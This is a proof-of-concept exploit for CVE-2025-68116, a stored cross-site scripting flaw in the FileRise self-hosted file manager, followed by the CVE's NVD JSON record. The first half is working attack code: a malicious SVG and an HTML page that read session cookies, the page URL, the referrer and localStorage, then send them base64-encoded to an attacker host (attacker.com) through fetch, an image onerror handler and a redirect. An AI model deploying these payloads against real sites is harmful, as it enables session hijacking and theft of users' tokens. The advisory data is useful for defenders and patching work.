CVE-2025-68116

<!-- Malicious SVG PoC for CVE-2025-68116 --> <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"> <script type="text/javascript"> // Steal session cookies and send to attacker server var stolenData = { cookies: document.cookie, url: window.location.href, referrer: document.referrer }; // Send data to attacker's server fetch('https://attacker.com/steal?data=' + btoa(JSON.stringify(stolenData))); // Alternative: Read localStorage var localStorageData = JSON.stringify(localStorage); fetch('https://attacker.com/steal?ls=' + btoa(localStorageData)); </script> </svg> <!-- Alternative HTML PoC --> <html> <body> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)"> <script>document.location='https://attacker.com/phishing?token='+btoa(document.cookie)</script> </body> </html>

{"cve": {"id": "CVE-2025-68116", "sourceIdentifier": "[email protected]", "published": "2025-12-16T17:16:11.100", "lastModified": "2026-01-02T16:48:47.757", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 2.7.1 are vulnerable to Stored Cross-Site Scripting (XSS) due to unsafe handling of browser-renderable user uploads when served through the sharing and download endpoints. An attacker who can get a crafted SVG (primary) or HTML (secondary) file stored in a FileRise instance can cause JavaScript execution when a victim opens a generated share link (and in some cases via the direct download endpoint). This impacts share links (`/api/file/share.php`) and direct file access / download path (`/api/file/download.php`), depending on browser/content-type behavior. Version 2.7.1 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L", "baseScore": 8.9, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filerise:filerise:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.1", "matchCriteriaId": "78983652-3799-4864-B25C-D60B2566071E"}]}]}], "references": [{"url": "https://github.com/error311/FileRise/security/advisories/GHSA-35pp-ggh6-c59c", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}